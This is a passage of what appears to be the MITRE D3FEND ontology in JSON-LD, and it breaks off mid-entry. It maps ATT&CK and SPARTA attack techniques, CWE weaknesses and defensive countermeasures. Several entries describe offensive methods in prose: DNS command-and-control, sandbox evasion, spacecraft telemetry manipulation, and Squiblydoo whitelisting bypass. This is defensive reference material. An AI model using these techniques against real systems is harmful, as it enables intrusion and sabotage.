        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:T1559.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.002",
      "d3f:definition": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "rdfs:label": "Dynamic Data Exchange",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:CWE-412",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-412",
      "d3f:definition": "The product properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.",
      "rdfs:label": "Unrestricted Externally Accessible Lock",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:HTTPTraceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP TRACE method is used to perform a message loop-back test along the path to the target resource.",
      "rdfs:label": "HTTP TRACE Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForManagedSecurityAssessmentAndMitigation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9544324B2"
      },
      "d3f:kb-abstract": "In an embodiment of the invention, a system for assessing vulnerabilities includes: a security management system; a network device in a system under test (SUT), wherein the network device is privy to traffic in the SUT; and wherein the SMS is privy to traffic that is known by the network device and/or to one or more traffic observations that is known by the network device.",
      "d3f:kb-author": "Scott Parcel",
      "d3f:kb-organization": "Cenzic Inc, Trustwave Holdings Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkVulnerabilityAssessment"
      },
      "d3f:kb-reference-title": "System and method for managed security assessment and mitigation",
      "rdfs:label": "Reference - System and method for managed security assessment and mitigation"
    },
    {
      "@id": "d3f:CWE-541",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-541",
      "d3f:definition": "If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system.",
      "rdfs:label": "Inclusion of Sensitive Information in an Include File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:DS0008",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components",
      "rdfs:comment": "This data source captures events relating to kernel modules and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Kernel (ATT&CK DS)"
    },
    {
      "@id": "d3f:SystemInitProcess",
      "@type": "owl:Class",
      "d3f:definition": "A system initialization process is a process that executes to initialize (boot) an operating system.",
      "rdfs:label": "System Init Process",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Booting"
        },
        {
          "@id": "dbr:Linux_startup_process"
        },
        {
          "@id": "dbr:Windows_startup_process"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "skos:altLabel": [
        "System Initialization Process",
        "System Startup Process"
      ]
    },
    {
      "@id": "d3f:RestoreSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreSoftware"
      ],
      "d3f:d3fend-id": "D3-RS",
      "d3f:definition": "Restoring software to a host.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Restore Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:Nbadd871e6fa646f39a8112241cd8f167"
        }
      ]
    },
    {
      "@id": "_:Nbadd871e6fa646f39a8112241cd8f167",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1071.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.004",
      "d3f:definition": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "rdfs:label": "DNS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N907675fc8385414fbc8f0df62f920ebb"
        }
      ]
    },
    {
      "@id": "_:N907675fc8385414fbc8f0df62f920ebb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:IMP-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0004",
      "d3f:definition": "Measures designed to permanently impair (either partially or totally) the use of a system. Threat actors may target various subsystems or the hosted payload in such a way to rapidly increase it's degradation. This could potentially shorten the lifespan of the victim spacecraft.",
      "rdfs:label": "Degradation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Degradation"
    },
    {
      "@id": "d3f:Reference-CAR-2020-05-003%3ARareLolBASCommandLines_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-05-003/"
      },
      "d3f:kb-abstract": "LoLBAS are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they’re used (this would depend on your environment), but many others are very common and can’t be simply alerted on.\n\nThis analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.\n\nThe analytic needs to be tuned. The 1.5 in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-05-003: Rare LolBAS Command Lines",
      "rdfs:label": "Reference - CAR-2020-05-003: Rare LolBAS Command Lines - MITRE"
    },
    {
      "@id": "d3f:fork",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "fork",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:CWE-655",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-655",
      "d3f:definition": "The product has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose.",
      "rdfs:label": "Insufficient Psychological Acceptability",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001146_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs NSA-approved cryptography to protect classified information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001146"
    },
    {
      "@id": "d3f:CCI-001414_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for controlling the flow of information between interconnected systems based on organization-defined information flow control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001414"
    },
    {
      "@id": "d3f:IA-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "IA-0002",
      "d3f:definition": "Adversaries target SDR-based transceivers and payload radios because reconfigurable waveforms, FPGA bitstreams, and software flowgraphs create programmable footholds. Manipulation can occur in the radio’s development pipeline (toolchains, out-of-tree modules), at integration (loading of bitstreams, DSP coefficients, calibration tables), or in service via update channels that deliver new waveforms or patches. On-orbit SDRs often expose control planes (command sets for mode/load/select), data planes (baseband I/Q), and management/telemetry paths, any of which can embed covert behavior, alternate demod paths, or hidden subcarriers. A compromised SDR can establish clandestine command-and-control by activating non-public waveforms, piggybacking on idle fields, or toggling to time/ephemeris-triggered profiles that blend with nominal operations. On the ground, compromised SDR modems can be used to fabricate mission-compatible emissions or to decode protected downlinks for reconnaissance. Attackers leverage the SDR’s malleability so that malicious signaling, once seeded, presents as a legitimate but rarely exercised configuration.",
      "d3f:may-modify": [
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        },
        {
          "@id": "d3f:Software-definedRadioWaveformApplication"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:Software-definedRadio"
      },
      "rdfs:label": "Compromise Software Defined Radio - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAInitialAccessTechnique"
        },
        {
          "@id": "_:Ndbc00f9e2c4d441692bfde18b9d39b7f"
        },
        {
          "@id": "_:Nbfec88e57a144916b6d8ced600d7f613"
        },
        {
          "@id": "_:N0732849e5a6e4e54a651e676032c3cff"
        }
      ],
      "skos:prefLabel": "Compromise Software Defined Radio"
    },
    {
      "@id": "_:Ndbc00f9e2c4d441692bfde18b9d39b7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:Nbfec88e57a144916b6d8ced600d7f613",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "_:N0732849e5a6e4e54a651e676032c3cff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:T1074.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074.001",
      "d3f:definition": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
      "d3f:may-create": {
        "@id": "d3f:File"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateFile"
      },
      "rdfs:label": "Local Data Staging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1074"
        },
        {
          "@id": "_:N8f63619a00b94db4923e0ba26c4d6fee"
        },
        {
          "@id": "_:N86733ea74ba242faa3d3f72280d4ab85"
        }
      ]
    },
    {
      "@id": "_:N8f63619a00b94db4923e0ba26c4d6fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N86733ea74ba242faa3d3f72280d4ab85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:NetworkIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkIsolation"
      ],
      "d3f:d3fend-id": "D3-NI",
      "d3f:definition": "Network Isolation techniques prevent network hosts from accessing non-essential system network resources.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Network Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4c8492875a7b4cc1b86d0eb164186985"
        }
      ]
    },
    {
      "@id": "_:N4c8492875a7b4cc1b86d0eb164186985",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:REC-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.03",
      "d3f:definition": "Adversaries collect high-level operational descriptors to predict when the mission will be busy, distracted, or temporarily less instrumented. Useful items include CONOPS overviews, daily/weekly activity rhythms, ground pass schedules, DSN or commercial network windows, calibration and maintenance timelines, planned wheel unloads or thruster burns, conjunction-assessment cycles, and anomaly response playbooks at the level of “who acts when.” For constellations, they seek plane/slot assignments, phasing and drift strategies, crosslink usage, and failover rules between vehicles. These descriptors enable time-targeted campaigns, e.g., sending malicious but syntactically valid commands near handovers, exploiting reduced telemetry during safing, or saturating links during high-rate downlinks.",
      "rdfs:label": "Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Operations"
    },
    {
      "@id": "d3f:T1504",
      "@type": "owl:Class",
      "d3f:attack-id": "T1504",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile  (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.013",
      "rdfs:label": "PowerShell Profile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.013"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1259",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1259",
      "d3f:definition": "The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.",
      "rdfs:label": "Improper Restriction of Security Token Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1505",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505",
      "d3f:definition": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)",
      "rdfs:label": "Server Software Component",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:DE-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003",
      "d3f:definition": "The adversary manipulates housekeeping and control values that operators and autonomy rely on to judge activity, health, and command hygiene. Targets include command/telemetry counters, event/severity flags, downlink/reporting modes, cryptographic-mode indicators, and the system clock. By rewriting, freezing, or biasing these fields, and by selecting reduced or summary telemetry modes, unauthorized actions can proceed while the downlinked picture appears routine or incomplete. The result is delayed recognition, misattribution to environmental effects, or logs that cannot be reconciled post-facto.",
      "rdfs:label": "On-Board Values Obfuscation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "On-Board Values Obfuscation"
    },
    {
      "@id": "d3f:ComputerNetworkNode",
      "@type": "owl:Class",
      "d3f:definition": "A network node running on a computer platform.",
      "rdfs:label": "Computer Network Node",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_endpoint"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerPlatform"
        },
        {
          "@id": "d3f:NetworkNode"
        }
      ]
    },
    {
      "@id": "d3f:OperationalActivityPlan",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An activity is a specific behavior representing a set of actions that may be accomplished by an agent.",
      "d3f:synonym": [
        "Business Process",
        "Mission Critical Function",
        "Mission Function",
        "Organizational Activity Plan"
      ],
      "rdfs:label": "Operational Activity Plan",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00408356-n"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Business_Process_Model_and_Notation"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/IDEF0"
        },
        {
          "@id": "https://enterpriseintegrationlab.github.io/icity/Activity/doc/index-en.html"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Plan"
      }
    },
    {
      "@id": "d3f:OTVariableAccessRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-OVAR",
      "d3f:definition": "Assign read/write access controls on designated registers or data tags to prevent unauthorized writes.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:kb-article": " ## How it works\n\nMany OT Controllers and OT Communication Modules enable Read-Only or Read/Write access on a per-tag basis.\n\nAs an example, when configuring OT process tags which can be accessed using the Modbus protocol, configure the tag to a Modbus Input Register to leverage the protocol's registry ranges, restricting the ability of external sources to modify data.\n\nIn Siemens, each data block (DB) tag can be configured as \"data block write-protected in the device.\"\n",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PLX3x-Series-Multi-Protocol-Gateways"
        },
        {
          "@id": "d3f:Reference-S7-1200-Programmable-controller"
        },
        {
          "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
        }
      ],
      "d3f:limits": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:restricts": {
        "@id": "d3f:OTWriteCommand"
      },
      "d3f:synonym": "OT Variable Access Policy",
      "rdfs:isDefinedBy": "Top 20 Secure Coding Practices, #10",
      "rdfs:label": "OT Variable Access Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N18411b3632b34fec9bf3c329b1f943c0"
        },
        {
          "@id": "_:N86fb5467f1004a52a59ba1cfe2b1669b"
        },
        {
          "@id": "_:Naf2dc5e8daaa46c2ab3ebafe5af016cb"
        }
      ]
    },
    {
      "@id": "_:N18411b3632b34fec9bf3c329b1f943c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "_:N86fb5467f1004a52a59ba1cfe2b1669b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:limits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:Naf2dc5e8daaa46c2ab3ebafe5af016cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:CWE-253",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-253",
      "d3f:definition": "The product incorrectly checks a return value from a function, which prevents it from detecting errors or exceptional conditions.",
      "rdfs:label": "Incorrect Check of Function Return Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T1633.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1633.001",
      "d3f:definition": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads.",
      "rdfs:label": "System Checks - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1633"
      },
      "skos:prefLabel": "System Checks"
    },
    {
      "@id": "d3f:Reference-Squiblydoo_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-003/"
      },
      "d3f:kb-abstract": "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-003: Squiblydoo",
      "rdfs:label": "Reference - CAR-2019-04-003: Squiblydoo - MITRE"
    },
    {
      "@id": "d3f:CWE-1423",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1423",
      "d3f:definition": "Shared microarchitectural predictor state may allow code to influence transient execution across a hardware boundary, potentially exposing data that is accessible beyond the boundary over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information caused by Shared Microarchitectural Predictor State that Influences Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:ConnectionAttemptAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConnectionAttemptAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-CAA",
      "d3f:definition": "Analyzing failed connections in a network to detect unauthorized activity.",
      "d3f:kb-article": "## How it works\nConnection Attempt Analysis in multiple ways.\n\n### Monitoring traffic to unallocated IP space\nOne approach looks for failed connection attempts against unallocated IP space. First, network traffic is captured to map out the network to identify network assets as well as unallocated IP space. The map is then used to determine if connection attempts are being made to the unallocated IP space.\n\n### Monitoring for sequentially transmitted traffic\nAnother approach passively inspects network traffic with application protocol analyzers observing network activity characteristics such as volume of packets sent/ received, TCP session attributes, and connection information between hosts (start time, source/destination host, services, etc.). Then using pattern matching to identify traffic which appears to be probing for network hosts.\n\n## Considerations\n\n* Implementations that rely on analysis of unallocated IP address space increase in their complexity with network size and decentralized network infrastructure.\n* Inventory of unallocated IP space should should be continuously updated to mitigate the risk of false positives.\n* IPv6 also introduces challenges including IPv6 traffic bypassing IPv4 specific protection systems (ex. firewalls and IDS) and complexity in managing both IPv6 and IPv4 addresses.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectingNetworkReconnaissanceByTrackingIntranetDark-netCommunications_VECTRANETWORKSInc"
      },
      "d3f:synonym": "Network Scan Detection",
      "rdfs:label": "Connection Attempt Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N1b7b77cae3e74fad8d89d95bd1700e9f"
        }
      ]
    },
    {
      "@id": "_:N1b7b77cae3e74fad8d89d95bd1700e9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-108",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-108",
      "d3f:definition": "Every Action Form must have a corresponding validation form.",
      "rdfs:label": "Struts: Unvalidated Action Form",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:OutboundInternetMailTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet DNS lookup traffic is network traffic using a standard email protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Mail Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "skos:altLabel": "Outbound Internet Email Traffic"
    },
    {
      "@id": "d3f:T0818",
      "@type": "owl:Class",
      "d3f:attack-id": "T0818",
      "d3f:definition": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Engineering Workstation Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Engineering Workstation Compromise"
    },
    {
      "@id": "d3f:StartupDirectory",
      "@type": "owl:Class",
      "d3f:definition": "A startup directory is a directory containing executable files or links to executable files which are run when a user logs in or when a system component or service is started.",
      "rdfs:label": "Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Role-based Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(7)"
    },
    {
      "@id": "d3f:T0812",
      "@type": "owl:Class",
      "d3f:attack-id": "T0812",
      "d3f:definition": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)",
      "rdfs:label": "Default Credentials - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Default Credentials"
    },
    {
      "@id": "d3f:display-baseurl",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "A base string to use as prefix to create a full URL for an entity. The baseurl must end in a forward slash: /",
      "rdfs:label": "display-baseurl",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:NumericPatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NPM",
      "d3f:definition": "Numeric pattern matching uses a pattern specification and sees if the numeric value matches that pattern--simple forms include exact matching and range matching.",
      "rdfs:label": "Numeric Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PatternMatching"
      }
    },
    {
      "@id": "d3f:Session",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, in particular networking, a session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (see Login session). A session is set up or established at a certain point in time, and then torn down at some later point. An established communication session may involve more than one message in each direction. A session is typically, but not always, stateful, meaning that at least one of the communicating parts needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Session_(computer_science)"
      },
      "rdfs:label": "Session",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/session"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1444",
      "@type": "owl:Class",
      "d3f:attack-id": "T1444",
      "d3f:definition": "An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Masquerade as Legitimate Application - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Masquerade as Legitimate Application"
    },
    {
      "@id": "d3f:Reference-FrameworkForNotifyingADirectoryServiceOfAuthenticationEventsProcessedOutsideTheDirectoryService_OracleInternationalCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
